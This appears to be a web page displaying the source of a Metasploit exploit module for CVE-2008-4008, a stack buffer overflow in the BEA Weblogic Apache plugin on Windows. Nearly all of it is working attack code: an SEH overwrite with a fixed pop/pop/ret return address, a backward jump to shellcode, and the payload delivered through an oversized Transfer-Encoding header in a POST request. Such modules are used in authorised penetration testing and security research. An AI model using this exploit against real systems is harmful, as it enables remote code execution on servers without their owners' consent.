Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :pattern => [ /Apache/ ] }910include Msf::Exploit::Remote::HttpClient11include Msf::Exploit::Remote::Seh1213def initialize(info = {})14super(update_info(info,15'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',16'Description' => %q{17This module exploits a stack based buffer overflow in the BEA18Weblogic Apache plugin. This vulnerability exists in the19error reporting for unknown Transfer-Encoding headers.20You may have to run this twice due to timing issues with handlers.21},22'Author' => 'pusscat',23'References' =>24[25[ 'CVE', '2008-4008' ],26[ 'OSVDB', '49283' ]27],28'DefaultOptions' =>29{30'EXITFUNC' => 'seh',31},32'Privileged' => true,33'Platform' => 'win',34'Payload' =>35{36'Space' => 500,37'BadChars' => "\x00\x0d\x0a",38'StackAdjustment' => -1500,39},40'Targets' =>41[42[ 'Windows Apache 2.2 version Universal',43{44'Ret' => 0x1001f4d6, #pop/pop/ret45}46],47],48'DisclosureDate' => '2008-09-09',49'DefaultTarget' => 0))50end5152def exploit5354sploit = rand_text_alphanumeric(5800)55sploit[5781, 8] = generate_seh_record(target.ret)56# Jump backward to the payload57sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"58sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded5960datastore['VHOST'] = 'localhost'61send_request_cgi(62{63'method' => 'POST',64'url' => '/index.jsp',65'data' => '',66'headers' =>67{68'Transfer-Encoding' => sploit69}70})7172handler7374end75end767778